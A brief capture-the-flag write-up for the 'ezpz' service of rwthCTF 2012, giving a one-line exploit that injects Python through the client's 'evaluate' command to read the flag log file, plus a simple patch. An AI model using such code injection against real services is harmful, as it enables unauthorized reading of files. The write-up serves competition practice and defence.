rwthctf2012 -- ezpz
rwthCTF 2012 - ezpz
Flags were stored in log/ezlog and we could got them via ezclient.pyExploit:
./ezclient.py 10.12.X.10 evaluate 'fl = open("/home/ezpz/log/ezlog","r"); \
print fl.read(); fl.close()' | egrep -o -e "\w{16}"
Patch:
mv log `uuid`
and change path in ezpz.py from log/ to generated uuidAlso there was another vulnerability, when you could get whois information, register and make admin_check
but we didn't use it because I found it very later